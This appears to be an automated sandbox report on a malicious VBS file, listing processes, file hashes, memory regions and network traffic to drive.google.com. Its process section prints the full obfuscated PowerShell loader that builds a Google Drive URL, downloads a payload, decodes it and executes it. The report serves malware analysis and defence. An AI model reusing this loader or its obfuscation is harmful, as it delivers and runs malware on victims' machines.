SHA512 444cf3033cc9205fa1b1c33694eccc52a33505517430334df806b63f418f362fb42c48e16565bb3bca5321c1b530a81ad110e7236c8a50b991570808d152b191

memory/1092-288-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

memory/856-289-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/856-290-0x0000000002790000-0x0000000002810000-memory.dmp

memory/856-291-0x0000000002790000-0x0000000002810000-memory.dmp

memory/856-293-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1092-294-0x0000000005630000-0x0000000005631000-memory.dmp

memory/1092-292-0x0000000006620000-0x000000000A2C8000-memory.dmp

memory/856-295-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1092-296-0x0000000076EA0000-0x0000000077049000-memory.dmp

memory/1092-297-0x0000000072F90000-0x000000007353B000-memory.dmp

memory/1092-298-0x0000000077090000-0x0000000077166000-memory.dmp

memory/1092-299-0x0000000002AB0000-0x0000000002AF0000-memory.dmp

memory/2356-300-0x0000000076EA0000-0x0000000077049000-memory.dmp

memory/2356-303-0x0000000077090000-0x0000000077166000-memory.dmp

memory/2356-302-0x00000000770C6000-0x00000000770C7000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 646d58e4428405c544e09efe52f7777e
SHA1 27cfe7046da07b642f19c9dca09841cf19660a19
SHA256 241d4569065467443b5470bd99127fdb6d990c021b895ce38ed62450cf80eabc
SHA512 1414ae8078c9af4b242623f380f25956367d03db4e60e22e44e5407514927196eec6ded0086e68a8fad2ef22b6defca63806c63f1f34ebea5f43d0a00da69d87

C:\Users\Admin\AppData\Local\Temp\Tar9FE8.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/2356-324-0x0000000000B40000-0x0000000001BA2000-memory.dmp

memory/2356-325-0x0000000077090000-0x0000000077166000-memory.dmp

memory/2356-326-0x0000000001BB0000-0x0000000005858000-memory.dmp

memory/856-329-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2356-328-0x0000000077090000-0x0000000077166000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 10:33

Reported

2024-04-02 10:36

Platform

win10v2004-20231215-en

Max time kernel

92s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder 
Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble 
M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. 
Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4232 -ip 4232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 2580

Network

Country  Destination           Domain                          Proto
US       8.8.8.8:53            99.58.20.217.in-addr.arpa       udp
US       8.8.8.8:53            133.211.185.52.in-addr.arpa     udp
US       8.8.8.8:53            74.32.126.40.in-addr.arpa       udp
US       8.8.8.8:53            95.221.229.192.in-addr.arpa     udp
US       8.8.8.8:53            drive.google.com                udp
GB       142.250.187.206:443   drive.google.com                tcp
US       8.8.8.8:53            drive.usercontent.google.com    udp
GB       142.250.178.1:443     drive.usercontent.google.com    tcp
US       8.8.8.8:53            241.150.49.20.in-addr.arpa      udp
US       8.8.8.8:53            206.187.250.142.in-addr.arpa    udp
US       8.8.8.8:53            1.178.250.142.in-addr.arpa      udp
US       8.8.8.8:53            58.55.71.13.in-addr.arpa        udp
NL       52.142.223.178:80                                     tcp
US       8.8.8.8:53            217.106.137.52.in-addr.arpa     udp
US       8.8.8.8:53            103.169.127.40.in-addr.arpa     udp
US       8.8.8.8:53            56.126.166.20.in-addr.arpa      udp
US       8.8.8.8:53            99.56.20.217.in-addr.arpa       udp
US       8.8.8.8:53            218.110.86.104.in-addr.arpa     udp
US       8.8.8.8:53            19.229.111.52.in-addr.arpa      udp
US       8.8.8.8:53            172.210.232.199.in-addr.arpa    udp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 bc1cf314b005d09b35ef60120370d522
SHA1 23defd1625da6b63e19395f6b0e33d18d300f717
SHA256 276411a8c82dfe4093d3c1565a84bf0f0ba7264e31a4451fcb2337f3d4f9002b
SHA512 cfdae13b2a8bf95e43140f5e2b78ad112fd361cdaf8b5b95e1c94de3ae5b67c685538a12a264e1a3d0b03456e16f6636257d57aef7127c4f22a801c3aa1ed8f4

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 aae354de6a220541f89d7677795ecb63
SHA1 0d9ba51a9f59140568acf0d808f541048b0d5184
SHA256 9872edaf3a84593ec9e070a50d47c4e5a2d6f90fce2a4660841ee822b187b563
SHA512 a3c370ac3e4ab46cdee1ed42a337bd4c9466ff99dd79bdb145d38ae99d2fdda370c873b9ab2f838a0e860b2d13a8026643a5903abccb5e2e362f94ea89e06ee3

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 b1144019ffec4ccf65bc9771f7210179
SHA1 65c93abc5a24d5a0441a6dbbcce2a3c79cb186a1
SHA256 6ae2757d6b31b2ce0e3bf86274d8042d0d61b946f4aa56bf7fd6b2937a906893
SHA512 8c282eabad88a50dea7ca99f2b492d20a8ace1811155119324f61ee4832c470b401ccf6e0cc6d52f26fb9d20594e541092805fba4659e50ecb3b1f096d50a82e

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 b59dd8b19715ca519b51d0001a929f86
SHA1 ad85d8a0910a91ab6edd033440c11a3838f7d144
SHA256 41576d8efb696356764f7277c60755d3045a47b506b8d58feb3ea294b97731a0
SHA512 4a993657374b6bafa09a03b9932861bcb04e7c7e441b56d69f16614f49e7eb9ecac09213b7f0f6277cbd43584df20134b6a539e70ed04021f5819a6f40f497b6

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_br2rfiqb.w2e.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1736-246-0x000001C7A8DE0000-0x000001C7A8E02000-memory.dmp

memory/1736-254-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp

memory/1736-255-0x000001C7A8520000-0x000001C7A8530000-memory.dmp

memory/1736-256-0x000001C7A8520000-0x000001C7A8530000-memory.dmp

memory/1736-257-0x000001C7A9150000-0x000001C7A9176000-memory.dmp

memory/1736-258-0x000001C7A91E0000-0x000001C7A91F4000-memory.dmp

memory/1736-259-0x000001C7A8520000-0x000001C7A8530000-memory.dmp

memory/4232-261-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/4232-260-0x0000000004EB0000-0x0000000004EE6000-memory.dmp

memory/4232-262-0x0000000002B10000-0x0000000002B20000-memory.dmp

memory/4232-263-0x0000000005520000-0x0000000005B48000-memory.dmp

memory/4232-264-0x0000000005480000-0x00000000054A2000-memory.dmp

memory/4232-265-0x0000000005C50000-0x0000000005CB6000-memory.dmp

memory/4232-266-0x0000000005D30000-0x0000000005D96000-memory.dmp

memory/4232-276-0x0000000005E20000-0x0000000006174000-memory.dmp

memory/4232-277-0x0000000006440000-0x000000000645E000-memory.dmp

memory/4232-278-0x0000000006980000-0x00000000069CC000-memory.dmp

memory/4232-280-0x0000000006A20000-0x0000000006A3A000-memory.dmp

memory/4232-279-0x0000000007C80000-0x00000000082FA000-memory.dmp

memory/4232-282-0x0000000007690000-0x00000000076B2000-memory.dmp

memory/4232-281-0x0000000007700000-0x0000000007796000-memory.dmp

memory/4232-283-0x00000000088B0000-0x0000000008E54000-memory.dmp

memory/4232-284-0x00000000078E0000-0x0000000007902000-memory.dmp

memory/4232-285-0x0000000007940000-0x0000000007954000-memory.dmp

memory/4232-286-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/1736-289-0x00007FFB39C30000-0x00007FFB3A6F1000-memory.dmp